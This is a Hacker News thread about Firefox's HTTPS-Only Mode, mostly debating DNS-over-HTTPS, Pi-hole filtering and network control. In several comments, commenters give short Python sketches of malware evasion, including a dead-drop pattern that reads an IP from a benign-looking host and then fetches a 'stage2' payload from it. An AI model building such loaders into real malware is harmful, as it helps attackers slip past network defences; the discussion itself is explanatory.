Firefox 83 introduces HTTPS-Only Mode (blog.mozilla.org)
950 points by tomwas54 on Nov 17, 2020 | 508 comments


I’m surprised at the negative knee-jerk reaction. I actually love this idea immediately. It encapsulates something I kind of already wanted when using HTTPS Everywhere.

This doesn’t guarantee the transport is end-to-end secure; I’m sure plenty will strip the encryption at an LB and then possibly send it back over the internet. But, I think it’s a good addition nevertheless. Here’s to hoping for more DoH and encrypted SNI adoption as well. No good reason to leave anything unencrypted if it doesn't have to be.

(I’m less happy with Firefox’s approach to DoH rollout, but I’m still glad to see DoH gaining some traction. Let’s hope the end result is worth it...)


I want my OS to do DNS - including DOH, not my browser. I want a single source for my DNS

I want my network to tell me a DNS server to use. As I own my computer I can override that, but much of the time I want to use the network provided DNS server.


> I want my OS to do DNS - including DOH, not my browser.

The cat is out of the bag, so to speak. I foresee a lot of adware, spyware, and malware leveraging DoH now to evade just about every DNS-based monitoring/blocking/provisioning solution.

Anyway, the right layer to monitor for Internet traffic has always been the IP layer (VPNs notwithstanding).


This has always felt like a strange concern to me. It’s a bit like refusing to have gloves in your house, so that a burglar can’t borrow your gloves to avoid leaving fingerprints.

Adware, spyware, and malware have always had the ability to avoid system DNS. At its most basic, they could hardcode lists of IPs into their malicious code. At its most complex, the same building blocks that DoH/DoT use were available to them: they could build similar tools that tunnel over HTTPS/SSH/etc, whichever protocol they felt was least conspicuous on their target system. Drop a list of hostnames into a pastebin post, tell your malware to check the list for updates, profit.
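
To make that last trick concrete, here's a rough Python sketch (the URL is invented; the point is only how little code it takes):

    # Fetch a hostname list over ordinary HTTPS. The paste host itself looks
    # benign to DNS-based filtering; the names inside the list are the part
    # that actually changes over time. (URL is hypothetical.)
    import requests

    resp = requests.get("https://paste.example.com/raw/abc123", timeout=10)
    hostnames = [line.strip() for line in resp.text.splitlines() if line.strip()]
    print(hostnames)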

DoH in Firefox simply makes the above issue harder to ignore. Before this, an enterprise or individual sysadmin could implement DNS inspection at the border, see logs showing their users browsing naughty websites, and feel like they’d made progress. But they’d always be blind to attackers (or nefarious users) who just didn’t bother using the stock DNS offering to bootstrap their hijinks. Detecting that has always required device-level monitoring or further MITM of traffic; learning about DoH makes that more obvious to sysadmins, but it doesn’t materially change what adversaries were able to do already.


> At its most basic, they could hardcode lists of IPs into their malicious code.

Which makes the malware more fragile, because the hosts are often compromised machines themselves, or are the targets of takedowns. If they include only one IP at a time (as they can do with DNS) then when that machine gets cleaned by the owners, they have no way to switch to another one. If they list several machines then anyone analyzing the malware has a list of multiple compromised machines to go have them all cleaned at once. Also, then you can add the IP address to a block list and they can't update it like they can with DNS. Also, if they use an IP address then they can't be using SNI to host it on the same IP address as several other domains.

> At its most complex, the same building blocks that DoH/DoT use were available to them: they could build similar tools that tunnel over HTTPS/SSH/etc, whichever protocol they felt was least conspicuous on their target system.

Malicious javascript in a browser doesn't have access to SSH or similar. And that's assuming their code can even reach your machine if your Pi-hole is blocking the DNS name of the server hosting it.

> DoH in Firefox simply makes the above issue harder to ignore.

It makes it harder to prevent. Someone sends the user an email link to a URL containing an unpatched browser exploit or a link to a malicious binary. If the Pi-hole blocks the domain and/or the IP address in the email, the attack is prevented. If the browser bypasses the Pi-hole, you have malicious code actually running on the user's machine, and that's a much bigger problem.


Hardcoding the IP certainly has limitations but that is only the easiest example of bypassing DNS-based content blocking. A slightly less trivial solution where you grab the IP out of a file over HTTP instead could be easily implemented by any junior developer.

> Also, if they use an IP address then they can't be using SNI to host it on the same IP address as several other domains

Sure they can, just hardcode the "Host" header value as well

> Malicious javascript in a browser doesn't have access to SSH or similar.

They can access HTTP though, which is more than enough.
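
For the plain-HTTP case that's essentially a one-liner; a sketch (IP and hostname invented; for HTTPS you'd additionally need to control the SNI value, which takes a bit more plumbing but is equally doable):

    # Talk to a shared-hosting IP directly and select the site with a
    # hardcoded Host header; no DNS lookup for the "real" name is involved.
    # The IP and hostname are hypothetical.
    import requests

    resp = requests.get("http://203.0.113.7/config.txt",
                        headers={"Host": "innocuous-blog.example"},
                        timeout=10)
    print(resp.status_code, len(resp.text))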


> A slightly less trivial solution where you grab the IP out of a file over HTTP instead could be easily implemented by any junior developer.

Over HTTP from what? You would need name resolution or a hard-coded IP address to make an HTTP request.

And the thing this is preventing isn't just what the malware does after you're already infected, it's the path to receiving malware to begin with.


GitHub, PyPi, NPM, etc are all great options for hosting dynamic content from a fixed location which looks benign to scanning.

For non-tech companies, replace with any relatively popular wiki.

The goal is “make a connection over HTTPS or other normal-looking protocol, to a destination that is both justifiably relevant for normal user traffic and allows the attacker to seed the next step”. And it turns out there are lots of sites that fit that bill.


> GitHub, PyPi, NPM, etc are all great options for hosting dynamic content from a fixed location which looks benign to scanning.

They're not going to leave malware payloads sitting there. Pastebins etc. get abused as malware command-and-control systems all the time, and of course some gets through, but countermeasures happen. Whereas for a DoH server it would be operating as designed.


As a parallel reply noted, the goal isn’t to host a payload on GitHub or a pastebin.

The issue is “how do I tell my bootstrapper where to get a payload from in an inconspicuous way”. To solve that, you find a benign site with existing business purpose (like GitHub or a wiki or a pastebin), and you insert your desired IP address. So maybe you add it as a new file in a repo under your cool new fake GitHub account, and the file just says “1.2.3.4”. Now you can tell your bootstrapper to make an HTTPS request for that file, which looks boring to any introspection because outbound requests to GitHub are normal, and to use the resulting IP to request the payload.

Your compromised payload host gets shut down? Spin up a new one, and update the file on GitHub with the new IP.
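
In code the whole dance is only a handful of lines; a hedged sketch where every URL and IP is invented:

    # Step 1: fetch a tiny text file from a benign, business-justified host.
    # Step 2: use the IP it contains to fetch the next stage.
    # All names and addresses here are hypothetical.
    import requests

    pointer = requests.get("https://wiki.example.com/notes/build.txt", timeout=10)
    ip = pointer.text.strip()                      # e.g. "1.2.3.4"

    next_stage = requests.get(f"http://{ip}/stage2", timeout=10)
    print(len(next_stage.content), "bytes fetched from", ip)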


> They're not going to leave malware payloads sitting there.

They do though; I usually check where spam emails lead, out of curiosity, and the payload is sometimes hosted on GitHub.

A simple GET request to https://github.com/adkafdjsh20/cool_repo/blob/master/dns.txt would work for DNS purposes.

Also, there are countermeasures for malware domains themselves, as you can report them to registrars.


Domains can be seized too, nothing is foolproof.


And don't you similarly also need name resolution or a hard-coded IP address in order to reach a malicious DoH server?


It's not a malicious DoH server. It's just any DoH server which is bypassing your Pi-hole and therefore resolves the malicious name instead of blocking it.


That's not the point. Don't you need to hardcode some kind of identifier in order to use your malware's preferred DoH server instead of the user's preferred one (which could have content blocking applied)?


The issue is with Firefox overriding the system DNS with its own by default, when the system DNS may have content blocking applied and the Firefox default may not.


I think if the user wants that, they should choose to apply it. Not the network operator. Same as how I wouldn't want my network operator inspecting my HTTPS traffic for malware.


I'm not sure why HN won't allow me to reply to ori_b's question below you; however, DoH in Firefox (and in Chrome) has clearly spelled-out ways to disable it at the network level for those folks who are network operators and want to restrict it due to interference with filtering or split-horizon DNS.

https://support.mozilla.org/en-US/kb/configuring-networks-di...

Someone previously mentioned Pi-hole. Pi-hole provides the DoH canary domain in its default configuration; therefore, if you run an up-to-date Pi-hole on your network you will have DoH disabled. It is recommended (and there are good instructions on the Pi-hole website) to set up cloudflared or a similar DNS resolver which implements DoH as the backend to Pi-hole, allowing it to use DoH when leaving your network but still act as the local network's authoritative name server.
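
For the curious, the canary mechanism is easy to observe yourself. A quick Python sketch (the canary domain is use-application-dns.net; the interpretation in the comments is my paraphrase of Mozilla's documented behaviour):

    # If the local resolver returns NXDOMAIN for the canary domain, Firefox's
    # default-on DoH rollout treats that as a network-level opt-out and keeps
    # using the OS resolver instead.
    import socket

    try:
        socket.getaddrinfo("use-application-dns.net", 443)
        print("canary resolves: this network does not signal a DoH opt-out")
    except socket.gaierror:
        print("canary blocked: default-on DoH would be disabled on this network")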

If you choose to be a network operator, there are some additional complexities you must think about. For those (majority of) users that choose not to be network operators, DoH is nearly transparent for them and provides significantly improved security and privacy by preventing local cache poisoning, DNS injection, and DNS snooping attacks on their browsing.

Additionally, while the default in Firefox is currently a non-filtering endpoint, you can manually configure the use of a filtering DoH endpoint like Cloudflare's 1.1.1.1 for Families if you wanted to do so. Nothing prevents this, and it can be configured network-wide in Firefox using the enterprise policy mechanisms.
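
If memory serves, the relevant enterprise policy is the DNSOverHTTPS block in policies.json; roughly something like the following (treat the exact keys and the Families endpoint URL as assumptions to check against the policy documentation):

    {
      "policies": {
        "DNSOverHTTPS": {
          "Enabled": true,
          "ProviderURL": "https://family.cloudflare-dns.com/dns-query",
          "Locked": true
        }
      }
    }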


> DoH in Firefox (and in Chrome) has clearly spelled-out ways to disable it at the network level for those folks who are network operators and want to restrict it due to interference with filtering or split-horizon DNS.

I still don't really understand this. Yes, it solves that problem, but how is it not also defeating the entire premise? If you had a DNS server from an adversarial network operator, they could just resolve the canary. So it means the browser's DoH is only secure if you can trust your network operator's DNS, at which point, what was its purpose supposed to be?

And the fear is that at some point someone is going to try to "correct" that by removing the check for the canary.


Right now is a transition phase; it is absolutely intended that some other, more resilient mechanism becomes available in the future. The canary domain provides a clear pathway, though, for existing Do53 configurations to prevent DoH when necessary.

There are still some specific cases where DoH is problematic, but these are being eliminated over time as the technology matures. A good example is split-horizon DNS in corporate environments. Right now, the only realistic way to provide this is with Do53, so DoH must be disabled, but with Microsoft adding DoH support to the Windows 10 DNS client, they are likely soon going to also support it in Windows DNS Server, which would enable businesses to make use of DoH internally and simply set the endpoint by enterprise policies.

DoH is a few different things, but at its most basic it's transport security for DNS, which is a fundamentally good idea any way you slice it. At some point in the future, plaintext DNS will effectively cease to exist and that's a /good thing/. There are several different implementations of encrypted DNS in the wild besides DoH (DoT and DNSCrypt, for example); whichever you choose, any option that encrypts DNS both on your local network and across external networks improves privacy and security.
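
To make "transport security for DNS" concrete: a DoH lookup is just an HTTPS request. A rough Python sketch against Cloudflare's JSON endpoint (endpoint and response shape as I recall them; other providers are analogous):

    # A DNS query carried over ordinary HTTPS; on the wire it is
    # indistinguishable from any other request to this host.
    import requests

    resp = requests.get(
        "https://cloudflare-dns.com/dns-query",
        params={"name": "example.com", "type": "A"},
        headers={"accept": "application/dns-json"},
        timeout=10,
    )
    for answer in resp.json().get("Answer", []):
        print(answer["name"], answer["type"], answer["data"])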

It takes a pretty long time to transition fundamental protocols like this, but a future where more things are sent across encrypted transports is a good future. Plaintext DNS is incredibly vulnerable, and it's also in an area which isn't heavily visible to most users, which is not a recipe for success.


The user can choose to ignore the canary in the app's settings (not the default though), or they could ignore it at an OS level. And it is indeed intended to be removed and replaced with a different mechanism eventually


The main thing I don’t want is to send all my browsing data to Cloudflare or similar “public” DNS operator outside my jurisdiction.


Currently, Firefox only has DoH rolled out in the US, so CloudFlare is in that same jurisdiction. Additionally, all DoH providers included in Firefox must meet the Trusted Recursive Resolver (TRR) guidelines, sign a contract to that effect, and undergo third-party audits to ensure they meet the requirements.

https://wiki.mozilla.org/Security/DOH-resolver-policy

This is all publicly documented. As Mozilla rolls DoH out to other regions they will add additional TRR partners and CloudFlare won't be the only choice.


While I'm not glad about the current Cloudflare monopoly on encrypted DNS, and I hope more providers spring up soon, I'm inclined to think that Cloudflare are much better able to maintain privacy and resist government intervention (where possible) compared to any local operator.


The user can do whatever they want. It's their machine. But you know perfectly well that almost everybody is going to take the default because they don't even know what the setting does, and end up disabling content blocking when they didn't intend to.

And in many cases the user is the network operator. What the browser is doing is taking away the mechanism to set local policy. Ordinarily you hand out the DNS you want your devices to use via DHCP, and they use it. If you move that from the OS to the application and the application ignores the DHCP setting by default, now you've lost the ability to set a uniform policy for all your devices and applications. It becomes an arduous manual process to change the setting in every application on every device, and then you probably miss half of them.


Yes, and I am saying the default should be to use a guaranteed source of truth and not something set by the network operator's policy. Same as how your trusted root CA certificates don't come from a network policy for example. I don't think we should be making a convention of inspecting users' private traffic, regardless of whether it is by default or by opt-in, under the guise of protecting them from malware.

DNS has historically been set by network policy so that it's easy for network operators to map hostnames to their local network resources. The point of the design wasn't to enable traffic monitoring or content blocking by altering the results for hosts that aren't under your control.


The problem is "guaranteed source of truth" doesn't exist. When the network operator is you, or your family/company, you may trust the local DNS to respect your privacy more than you do Cloudflare. Not all names are intended to resolve the same everywhere -- sometimes the local DNS will give the RFC1918 address for a local server instead of the public one, or have a set of local names that are only accessible on the local network. How do you propose to globally resolve the reverse lookup zones for 10.0.0.0/8 et al?


> you may trust the local DNS to respect your privacy more than you do Cloudflare

For most people, their local DNS is someone like Comcast or Verizon, way less trustworthy than CloudFlare. We shouldn't reduce the privacy of the majority of people just to increase it for a small minority of people by default.


If the DNS set by DHCP were only used for local network resources and not internet resources, I wouldn't have a problem with that. That is what it is there for.


There isn't a bifurcation in the namespace for local resources. Any given name could resolve to a local address or a public one. There isn't even anything requiring a local-only server to have a private address -- it's common to have a public IPv6 address for something which is still only resolvable or accessible from the local network.


I'm the user and the network operator. Can you give me a comprehensive list of places I need to configure, and notify me when another place software can go around my configuration is added?


I never said there wouldn't be an increased configuration burden for that kind of setup. There was also an increased configuration burden when we moved to widespread HTTPS, but the benefits outweighed the costs.


As a user, what is the increased administration burden for http?

Are you referring to the whole CA system being an untrustworthy racket?


As a user, what is the increased admin burden for using DoH, assuming you don't want to implement network level content blocking? Basically none.

What is the burden for using HTTPS assuming you DO want to be able to inspect and block HTTPS resources at a network level? Very extensive compared to plain HTTP.


>assuming you don't want to implement network level content blocking? //

Who doesn't want that? I have a pihole (and use OpenDNS). Bypassed it all yesterday, as an experiment, to look at an anime site my eldest started using and immediately was hit with a pretty impressive and convincing phishing attempt (mimicking my ISP).

Pretty much all of us on HN seem to use some form of 'DNS' based filtering (pihole, or even just hosts file). UK ISPs offer DNS based filtering as a default (and have to filter some pages by law, and are encouraged to filter others [through threat of law]) ... but a lot of people want that, many many families, schools, businesses.

Certainly I don't want it to be easier for advertising and malware to bypass my chosen DNS-style filtering.


I don't want it and I don't recommend it to my peers. I also don't think DNS-based content blocking is really as popular as the PiHole community would say. I use client-side content blocking like uBO instead, which I imagine is overwhelmingly the more common solution, and it is also more powerful and effective (and easier to use).

UK ISPs having mandatory DNS blocking is a great example of why DoH is important. The user should decide what they want, not the network operator.

Perhaps widespread use of encryption technologies means I can't do content blocking on proprietary appliances like the Chromecast for example. I think that's a necessary evil and I just won't buy such an appliance if it's that big of a problem. Only legislation can really fix that kind of problem anyway, it doesn't really matter whether Firefox implements DoH or not.


Make the libc resolver do DoH and drop it from Firefox, and half the problems go away.

The other half of the problems are around defaulting to allowing Cloudflare to inspect your traffic instead of Comcast. And the lack of integrity and encryption for the rest of the DNS infrastructure. And the expansion of the complex and difficult-to-secure X.509 certificate regime, which we should be moving away from. (Something like Gossamer seems to be a big step in the right direction.)

I want encrypted dns, just not a half-assed hack of an implementation that is going to be impossible to fix once deployed.


I agree with you there, OS vendors should be implementing DoH. Thankfully they are finally getting around to it after pressure from browsers.

Regarding the rest of the DNS infrastructure, I agree there is more work to be done. But I see DoH/DoT/etc as a necessary step and not a "half-assed implementation" that needs to be "fixed".


That's not an issue with overriding the system DNS. It's the point of overriding the system DNS. Content blocking by anyone but the user is a bad thing, and if you the user want it, then install uBlock Origin or something.


I am not in disagreement.

> DoH in Firefox simply makes the above issue harder to ignore.

That's exactly what I mean [0]. The cat's always been there, so to speak, but now it is out there roaming around, harder to ignore.

[0] https://news.ycombinator.com/item?id=25123487 and https://en.wikipedia.org/wiki/Script_kiddie


> The cat is out of the bag, so to speak. I foresee a lot of adware, spyware, and malware leveraging DoH now to evade just about every DNS-based monitoring/blocking/provisioning solution.

But tunnelling X in Y is not new at all and has a long tradition (even in regular protocol design). Is this really a shift waiting to happen in malware? As far as I can tell, this has been available all along. Except for browser-based malware.


Right. It is ridiculous to say that DoH enables malware because it has always been trivial to bypass DNS-based access control with or without technologies like DoH. In fact, if anything, using DoH would be a particularly cumbersome way of doing it when there are many simpler solutions. Like for example, just putting an IP in a text file on a REST endpoint.


I think the best case I can make is that it's not about the ability to tunnel DNS, it's that there's now many fast highly-available public DoH resolvers that bypass DNS filtering for free. A hypothetical malware author just needs to use any of them rather than set up their own tunnel.


True, this aspect of the situation could make malware use cases a bit simpler to operate/maintain.


I've always assumed any device or program I don't control will bypass anything I tell it to use and tunnel all its evil traffic.

It does feel like the world is moving away from a multi-level network to running everything over TLS/TCP (and probably eventually mainly TLS/UDP), taking away the power from me as a network and device owner, and giving it to the developers.


If only the OS could terminate TLS and allow to filter decrypted traffic locally.


IBM z/OS has an interesting feature: AT-TLS (Application Transparent TLS). An app uses the OS sockets API to create plaintext sockets, and the OS adds TLS to them (based on policies configured by the sysadmin) transparent to the application. (There are IOCTLs that apps can call to discover this is going on, turn it on/off, configure it, etc, but the whole idea is you can add TLS support to some legacy app without needing any code changes, so adding those IOCTL calls to your app is totally optional.)

In some parallel universe, TLS would have been part of TCP not a separate protocol and the Berkeley sockets implementation in the OS kernel would handle all encryption, certificate validation, etc, on behalf of applications. AT-TLS is a bit like visiting that parallel universe


I think this is actually making a comeback for the server room; https://www.kernel.org/doc/html/latest/networking/tls.html for example. I _think_ the point of these is hardware TLS accelerators.


Linux kernel TLS, at least at the moment, only does the symmetric encryption part in the kernel; the TLS handshake and certificate validation have to be provided by user space. This is different from z/OS AT-TLS, in which the OS does the TLS handshake, certificate validation, etc. as well.

(Strictly speaking, I'm not sure if AT-TLS actually is implemented in the OS kernel – or "nucleus" to use the z/OS terminology – it may actually be implemented somewhere else, say in the C library. I know some of it is actually implemented by a daemon called PAGENT. But, from the application programmer's viewpoint, it is provided by the OS, however exactly the OS provides it.)


I was thinking more of devices I don't control - IOT stuff that requires internet access to function (like a box to watch netflix). Clearly anything running on my machine is fine as it's under my control


So between the user and the network operator, who should have the final say? It seems like you're saying, "it should be the user when I'm the user and it should be the network operator when I'm the network operator". But I don't think we can have it both ways.


Generally the policy should be

1) The ISP says what should be used

2) the lan either accepts that, or the operator puts their own values

3) the device either accepts that, or the operator puts their own values

Same as object inheritance. An ISP says "use this DNS server it's nearer", the network operator says "no thanks, I'll run my own with an upstream of Google as I don't like your NXDOMAIN injects", the user says "actually I'll use Cloudflare because I don't trust any of you".

That's all fine, and gives the power to the user.

As an exception, if a device doesn't allow the network settings to be overridden for some technical reason, it should simply accept what the LAN sends it.


I think there will be some contention over 1 and 2 because we're at the point where both of these entities might be trusted (at home and work) but are inherently untrustworthy.

And so browsers are saying that the path should be:

1) The browser developers say what should be used.

2) The user either accepts that or puts their own values.

Ideally I think it should actually be something like

1) The OS vendor say what should be used.

2) The user either accepts that or puts their own values.

2.1) Lan operators can offer DNS servers which the user can (always) accept or (always) reject with reject being the default.

But this whole mess with browser DoH is because OS vendors are slow to move on this. Google Android does it kinda, Windows has it in beta, Linux works but it's a little DIY.


Just point them to your http proxy and filter there all you want.


This is prevented by certificate pinning.


Only on a handful of domains. Most site admins are fearful of HPKP. The mitm proxy I am using to post this message only has to exclude a small handful of domains from mitm decrypting. A bunch of google domains, eff.org, paypal, a few mozilla domain names, dropbox and android. To my surprise, no traditional banks, no money management or stock trading sites, no "secure" portals used by law firms to share sensitive files. The sites I would expect to use pinning are the ones that do not.

On a side note, I would love to see a system that adds out-of-band validation of an entity. e.g. My bank should have a QR code behind glass on the wall that I can scan, import a key and further validate their site at the application layer, above and beyond HTTPS and CA certs.


Yep, and HTST (if you don't trust that, you can use a Firefox addon to perform certificate pinning). I believe HTST got introduced in the wake of the DigiNotar debacle (listen to Darknet Diaries #3). Mitmproxy also made it easy.

I guess this Mozilla Firefox change deprecates HTTPS Everywhere.

Either way, we've come a long way. For people in the Dutch security world, DigiNotar was a known joke. I knew about their terrible security (and the implications) back around 2000-2004. Although there have been more vulnerabilities too, such as Heartbleed and POODLE.


> HTST

I'm not familiar with HTST so I went looking but didn't find anything related to the web and HTTP, so I'm guessing you meant HSTS?


Yes, thanks for the correction.


You could easily add APIs for cert pinning at the OS level. Or provide the details needed to verify with the OS -> Program call return.


Isn't this SSL offloading and done by companies to introspect the traffic?


That only works as long as the CA trusted by the user's computer is controlled by the box trying to do this.


Which shouldn't be a problem since it's the box itself doing the decryption. No need to MiTM since it's the endpoint.


If we're going to talk about the "right" thing to do then don't run closed software or anything that doesn't do what you want and the problem goes away.


Run your own DNS server locally. It's not that hard.


I'm not fully understanding how this works. Can't the user just run their own secure DOH server and tell Firefox to use that instead?


Can you elaborate? An adware app will be installed in the OS, and will proxy all DNS requests?


Apps will make DoH requests from within the app itself to avoid host-based DNS blocking.


This is nothing that wasn't possible before. Taking the traditional example of hosts-blocking the Adobe activation servers, what was stopping them from just querying 1.1.1.1 from the app? Or even falling back on a hard-coded IP? Especially with IPv6, bypassing DNS-based blocks is rather trivial - the main reason we don't see it all that much is that companies simply don't care to do it. Users of PiHole and similar are usually the kinds of users who will figure out a way to block whatever they want one way or another, so there's no use in trying to stop them. Until we get hardware-enforced app signing (big middle finger to Apple here) we can block anything, regardless of DoH.


You're right, I guess the question is did they bother before. If normal DNS works fine for 95% of users, the hurdle of implementing a non-standard workaround is too much. If DOH is the norm, then the hurdle becomes lower.

Of course you can just drop a rule blocking the IP address on your firewall, which will probably work for a while.


I would argue that the hurdle of bypassing DNS-based content blocking was already so vanishingly small that it doesn't make any sense to impede useful and practical privacy technologies on that basis.

You could make the exact same kind of argument about widespread use of HTTPS for example. Do we want to allow encryption technology if it means the enemy can use it too? As a society we have agreed that encryption is a net positive even though terrorists and criminals benefit from it, but when malware uses it then that's too far?


>I would argue that the hurdle of bypassing DNS-based content blocking was already so vanishingly small [...] //

That doesn't hold up under scrutiny. My pihole blocks ~11% of domain lookups (blocking 1000 queries per day for our household); turning it off vastly increases the unwanted content. It might seem like a low hurdle logically, but it's a hurdle that works in practice.

I don't follow the reasoning that says this is a small barrier to malware so we'll remove it.

What are we, end users, getting out of routing all our domain lookups to Cloudflare and ceding control of filtering?


The next step is blocking all the traffic from all apps and whitelisting IP addresses app by app. I did it on my Android phone, a couple of phones ago. I don't remember the name of the app. It could be done on a desktop or server OS too.


That sounds like a fun way to spend your life.


At least in my case, network-provided DNS is the worst: full of spyware and tracking.


I run my own networks and my own devices; I choose what options go in my DHCP server.

If I were on a hostile network (say a hotel), then sure, I'll ignore their DNS server and use my own (or indeed just punch my way out via a VPN), but most of the time I use friendly networks, and I don't want to have to configure 20 different applications on a dozen different boxes to use a DNS provider of my choice. There's a reason I use DHCP in the first place.


You are able to run your own network and have the know-how to do so; typical Firefox users cannot.

Given your knowledge, you can disable DoH or even build Firefox with it disabled. It is a sensible default for the vast majority of users who do not know what DHCP is or control their network, and it is a trivial configuration change for people who do control their network and do not want the DoH service provider chosen by Firefox.

Also, many places do not allow VPN traffic either. It is not as easy to bypass monitoring in a locked-down environment like typical corporate firewalls, college campuses, etc. Yes, for every block in place, like deep packet inspection, there is usually some workaround, but these become increasingly difficult as the blocking becomes more stringent, and having options like DoH helps users who cannot or do not know how to run VPNs.


> Given your knowledge, you can disable DoH or even build Firefox with it disabled. It is a sensible default for the vast majority of users who do not know what DHCP is or control their network, and it is a trivial configuration change for people who do control their network and do not want the DoH service provider chosen by Firefox.

I have mixed feelings about the issue, but it's not that simple.

I run a variety of services on my LAN for my users and guests. That includes Unbound, so even though their browser doesn't know it, their queries are secure from my ISP. But more importantly I have other stuff behind hostnames (which are resolved by Unbound). For example, my guests can navigate to music/ and use a web interface to play any of the music in my library over the stereo.

Hopefully it's obvious why this is something useful to have.

Now that Firefox is intercepting DNS requests, a conversation with someone might go like this: "Oh, it's not working? Are you using Firefox? Yeah, Firefox broke this recently, let me get the IP address for you." And then I have to log in to a computer, ssh into the relevant system, and get its IP address on the LAN.

And that's just the beginning. Last I checked Cloudflare still can't resolve the archive.is / archive.today domains. Even though I use Cloudflare over TLS in Unbound, I fix this for myself and my users by sending these domains to Google instead. Anything as convenient and simplistic as Firefox just sending everything directly to Cloudflare can't do that.
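
(For reference, the per-domain override is just a forward-zone stanza in Unbound, something like the following; syntax from memory, so double-check it against the Unbound docs:)

    # unbound.conf: send only these domains to Google's resolvers
    forward-zone:
        name: "archive.is"
        forward-addr: 8.8.8.8
        forward-addr: 8.8.4.4
    forward-zone:
        name: "archive.today"
        forward-addr: 8.8.8.8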


If you follow the DNS specs this will not be a problem. If you use *.local for local domain names, DoH will never be triggered.

From the Mozilla documentation:

   "localhost" and names in the ".local" TLD will never be resolved via DOH. [1]
LAN-based services are a pretty common use case. Mozilla is hardly going to release this feature without considering this.

The Cloudflare / archive.is point is an esoteric debate and not a common occurrence; DoH does support providers other than Cloudflare, so I'm not sure if this is really a major concern.

[1] https://wiki.mozilla.org/Trusted_Recursive_Resolver


> If you follow the DNS specs this will not be a problem. If you use *.local for local domain names, DoH will never be triggered

I don't think PFsense + Unbound supports appending .local to every hostname automatically, so I'd have to change every last one of my hostnames to whatever.local and that seems like a real pain. (Surely most people are not using whatever.local in their /etc/hostname, right?)

> The Cloudflare / Archive.is point is esoteric debate and not a common occurence, DoH does support other providers than Cloudflare so not sure if this really a major concern

Sure, but my general point is that there's all sorts of different reasons why it can be useful for a LAN administrator to override the remote DNS response in certain specific cases. Given that Firefox is using Cloudflare by default, the fact that you can change it also doesn't really help anything, since after all the thing I'm specifically complaining about is that stuff randomly breaks for any of your guests using Firefox.


Yes it does, you set it in System > General Setup: https://docs.netgate.com/pfsense/en/latest/config/general.ht...

Then it will automatically register them in DNS with that name: https://docs.netgate.com/pfsense/en/latest/services/dns/reso...

> The domain name from System > General Setup is used as the domain name on the hosts.

Then in the DHCP configuration, you set the domain name as well (defaults to using the general setting): https://docs.netgate.com/pfsense/en/latest/services/dhcp/ipv...

> Specifies the domain name passed to the client to form its fully qualified hostname. If the Domain Name is left blank, then the domain name of the firewall is sent to the client.

The client will automatically try adding the domain when looking up hostnames. Normally on Linux the FQDN is not specified in /etc/hostname but only in /etc/hosts.


It is perhaps a reason for you (and others) not wanting to migrate; however, there is nothing wrong with the way the DoH functionality is implemented.

Cloudflare broke a lot of traffic when the 1.1.1.1 DNS server came up, and Google broke a lot of dev setups when they got the .dev TLD; it is not their fault though.


The default behaviour is to fallback to the network DNS if DoH doesn't resolve the domain, so your use case would work fine.

archive.is didn't work for Cloudflare users because they purposely sabotaged the results for Cloudflare (they did actually return valid, but wrong, results).

EDIT: Although you might have a problem if the owners of the ".music" TLD decide to put something else there.


If your network allows TLS to an arbitrary DoH server, it allows VPN over TLS to an arbitrary server.


A lot of networks block VPNs via port number + DPI, but can't really block DNS over HTTPS if it looks like a connection to any other HTTPS website.


Yes, which is why my VPNs are available on ports 443 and 53, including a TLS-based VPN.

Now port 53 can be, and often is, intercepted (but sometimes it gets through when 443 doesn't).


It does not matter what port you run the service on, including 443; deep packet inspection (DPI) can sniff out VPN traffic. Perhaps you have not encountered this type of firewall, as it is somewhat more expensive to run, both computationally and licensing-wise.

It is not possible to sniff out DoH traffic via DPI, as it looks exactly the same as regular HTTPS traffic.

Back when I was running Flash servers for media use in a corporate environment (when Flash was still a thing), I used to run into similar problems with RTMP/RTMPS constantly.


You can use an HTTPS "CONNECT" proxy to protect your VPN traffic in the same way (I assume that's the kind of setup they were referring to on port 443)


Why should Firefox want to enable users and devices to bypass the network owner's configuration in this way? A company should control their network, just as a home network's owner should have control.


Because Firefox represents their users' interests and not network owners' interests which are often hostile e.g. inserting ads into pages.


For the vast majority of people, "the network" is their ISP or a random hotspot, who should absolutely be treated as a hostile adversary.


How can DNS be "full of spyware"? Or are you saying that it is used for spying on you?

But anyway, it is your decision to use them - you can use 1.1.1.1 (CloudFlare), 8.8.8.8 (Google - if you don't mind the tracking) or any other DNS provider.


I don't know what GP meant with "full of spyware" but the most popular ISP in my region (Telefónica) used to redirect to pages filled with ads when a domain couldn't be resolved. Changing to 8.8.8.8 wouldn't work because it was unencrypted, they intercepted the requests and still redirected to ads. They stopped doing it some time ago but any ISP or middle man has the ability to continue doing that if they want.


Yes, this is the same thing that happens to me: all unencrypted websites are redirected to adware. On my phone I use the 1.1.1.1 app from Cloudflare, but on other devices this is still an issue.


Aren't all these public DNS providers getting unencrypted requests? So I assume ISPs snoop the domain lookups already, regardless of whether Google/Cloudflare/OpenDNS/Yandex do so.


That's the point of using DoH, to avoid sending unencrypted DNS requests so your ISP can't spy or intercept those requests. If you are using unencrypted DNS from Google/Cloudflare/etc you are just adding one more party that can see your requests. If you use DoH, in theory, you are replacing who can see your requests. In practice your ISP can still know what websites you visit thanks to unencrypted SNI or if the domain you are visiting is the only one on that IP (and probably other techniques I'm not aware of). There are many more variables than just DNS requests so if you really don't want your ISP knowing what websites you visit you have no choice but to use a VPN or Tor.


They're referring to the local network configuration.

Many sysadmins will hate this.

> Full of spyware, and tracking.

What do you use? Google?...



> I want my OS to do DNS - including DOH, not my browser. I want a single source for my DNS

I'll go further and say I want my router to handle this. It is unrealistic to expect every device on my network to natively support the standard, but it's pretty easy to have your local DNS endpoint reroute the traffic through DoH on its way out of your network. Right now I accomplish this by running cloudflared upstream of my Pihole.


"I want a single source for my DNS."

I don't like applications that do their own DNS resolution. I use a text-only browser that relies on the OS to do DNS resolution.

But imagine your DNS is filtered. Would you still want only a single source, e.g., your ISP? In that case, wouldn't you want multiple sources?

When in a DNS-filtered environment, e.g., a hotel, DOH outside the browser can actually be useful. For example, I can retrieve all the DNS data for all the domains on HN in a matter of minutes using HTTP/1.1 pipelining from a variety of DOH providers. The data goes into a custom zone file served from an authoritative nameserver on the local network. Browsing HN is much faster and more reliable when I do not need to do recursive DNS queries to remote servers. The third party resolver cache concept is still really popular, but IME most IP addresses are long-lived/static and "TTL" is irrelevant. I rarely need to update the existing RRs in the zone files I create and the number that need to be updated is very small.
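
As a sketch of that workflow (sequential rather than pipelined, and using one DoH provider's JSON interface purely as an example; the names and TTL are stand-ins):

    # Resolve a batch of names via a public DoH endpoint and emit
    # zone-file-style A records for a local authoritative server.
    import requests

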